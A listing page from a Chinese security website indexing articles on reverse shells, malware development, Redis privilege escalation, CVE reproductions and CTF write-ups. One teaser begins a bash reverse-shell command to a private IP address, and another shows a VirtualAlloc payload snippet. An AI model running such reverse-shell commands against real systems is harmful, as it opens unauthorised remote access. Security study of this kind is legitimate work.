socket - 第 8 | CN-SEC 中文网

安全文章

Linux 反弹shell

免责声明蟹堡安全团队的技术文章仅供参考，任何个人和组织在使用网络时应当遵守相关法律法规，不得利用网络从事危害国家安全、荣誉和利益的活动。未经授权，请勿利用文章中的技术资料对任何计算机系统...

11月21日8 views评论

阅读全文

安全文章

【MalDev-01】基础入门

01-简单介绍本课程中提及的恶意软件开发主要使用C/C++语言，例如： // 申请内存 memory_for_payload = VirtualAlloc(0, actual_payload_le...

11月20日38 views评论

阅读全文

安全文章

利用限制性的字符对LTER命令进行利用

转自先知社区：https://xz.aliyun.com/t/12335 作者：天明我们利用下面的骨架对LTER命令进行开发利用。#!/usr/bin/pythonimport osimport s...

11月15日17 views评论

阅读全文

安全文章

windows利用Redis主从复制获取系统权限

前言 redis在Linux中获取权限的办法较多，而在windows中Linux的那些获取权限办法基本无法使用，在windows中获取权限比较通用的是主从复制这个办法。一、主从复制在windows中的...

11月09日7 views评论

阅读全文

安全漏洞

CVE-2023-20887漏洞复现

一. 漏洞介绍CVE-2023-20887 是 VMware Aria Operations for Networks 中的命令注入漏洞，可用于实现远程代码执行 (RCE)。正如 Summoning ...

11月07日55 views评论

阅读全文

安全文章

hackme2 复现

hackme2 复现环境下载下载链接：https://www.vulnhub.com/entry/hackme-2,618/下载完成环境搭建打开虚拟机-》主页或虚拟机导...

11月01日36 views评论

阅读全文

多姿势弹shell 不怕姿势多，就怕记不住

反弹shell是我们最便捷的与目标建立连接的方式之一。本文为大家简单的汇总下常用的shell反弹姿势😘,希望对您的学习有所帮助。bashbash -i >& /dev/tcp/192.1...

11月01日安全文章16 views评论

阅读全文

安全文章

HTB之Chemistry

HTB之ChemistryEasy (linux) nmap -sS -p---min-rate 10000-Pn10.10.11.38#22,5000注册后自动登录，上传cif文件HTTPServe...

10月28日86 views评论

阅读全文

安全百科

Linux下的神奇文件类型 - 深入浅出聊聊套接字文件

大家好,我是V浪。今天我们来聊一个有趣的话题 - Linux系统下的套接字文件(Socket File)。1. 什么是套接字文件?说到文件,大家可能首先想到的是普通的文本文件、图片文件等。但在Linu...

10月21日36 views评论

阅读全文

程序逆向

重温经典栈溢出利用

点击蓝字关注我们重温经典栈溢出利用前言在计算机安全领域中，堆栈溢出（Stack Overflow）是一种广为人知的经典漏洞。无论是学习计算机科学的新手还是专业的安全研究人员，几乎都会在其职业生涯的早...

10月18日4 views评论

阅读全文

安全漏洞

CVE-2023-33246 Apache RocketMQ漏洞复现[附EXP]

本文结构漏洞描述影响范围漏洞复现代码漏洞POC复现过程使用Docker部署使用PoC查看是否存在此漏洞使用EXP进行复现Refer漏洞描述RocketMQ 5.1.0及以下版本，在一定条件下，存在远程...

10月18日44 views评论

阅读全文

安全文章

记一次通杀再到跨段的渗透再到提权假shell

感谢HashRun安全团队成员：明二公子，伊恒，T4x0r，Macfy（排名不分先后）此次渗透为定向渗透，定向二进制分析未授权主域名：http://www.xxxx.com/子域名：http://xx...

10月18日10 views评论

阅读全文

Linux 反弹shell

【MalDev-01】基础入门

利用限制性的字符对LTER命令进行利用

windows利用Redis主从复制获取系统权限

CVE-2023-20887漏洞复现

hackme2 复现

多姿势弹shell 不怕姿势多，就怕记不住

HTB之Chemistry

Linux下的神奇文件类型 - 深入浅出聊聊套接字文件

重温经典栈溢出利用

CVE-2023-33246 Apache RocketMQ漏洞复现[附EXP]

记一次通杀再到跨段的渗透再到提权假shell

在线咨询

微信